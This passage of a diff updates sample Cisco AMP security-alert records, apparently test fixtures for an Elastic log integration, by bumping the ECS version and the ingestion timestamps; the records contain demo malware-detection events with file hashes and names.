xe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -170,7 +170,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -200,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853990700Z", + "ingested": "2021-09-13T18:07:55.452473667Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -257,7 +257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -289,7 +289,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853992661Z", + "ingested": "2021-09-13T18:07:55.452475720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -346,7 +346,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -378,7 +378,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853994603Z", + "ingested": "2021-09-13T18:07:55.452477766Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -431,7 +431,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -451,7 +451,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853996517Z", + "ingested": "2021-09-13T18:07:55.452479754Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -502,7 +502,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -522,7 +522,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853998395Z", + "ingested": "2021-09-13T18:07:55.452481714Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -577,7 +577,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -597,7 +597,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854000301Z", + "ingested": "2021-09-13T18:07:55.452483701Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -652,7 +652,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -684,7 +684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854002194Z", + "ingested": "2021-09-13T18:07:55.452485647Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -739,7 +739,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -763,7 +763,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854004118Z", + "ingested": "2021-09-13T18:07:55.452487619Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -818,7 +818,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -842,7 +842,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854006008Z", + "ingested": "2021-09-13T18:07:55.452489569Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -902,7 +902,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -922,7 +922,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-12T17:32:23.854008008Z", + "ingested": "2021-09-13T18:07:55.452491758Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "kind": "alert", "start": "2021-01-14T12:27:42.000Z", @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1002,7 +1002,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854009893Z", + "ingested": "2021-09-13T18:07:55.452493688Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1048,7 +1048,7 @@ { "@timestamp": "2021-01-14T12:19:10.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1066,7 +1066,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:23.854011760Z", + "ingested": "2021-09-13T18:07:55.452495638Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583861114428195000", "kind": "alert" @@ -1112,7 +1112,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1138,7 +1138,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:23.854013646Z", + "ingested": "2021-09-13T18:07:55.452497572Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -1202,7 +1202,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1234,7 +1234,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854015534Z", + "ingested": "2021-09-13T18:07:55.452499476Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "kind": "alert", "action": "Threat 
Detected", @@ -1291,7 +1291,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1311,7 +1311,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854017516Z", + "ingested": "2021-09-13T18:07:55.452501462Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1362,7 +1362,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1382,7 +1382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854019384Z", + "ingested": "2021-09-13T18:07:55.452503367Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 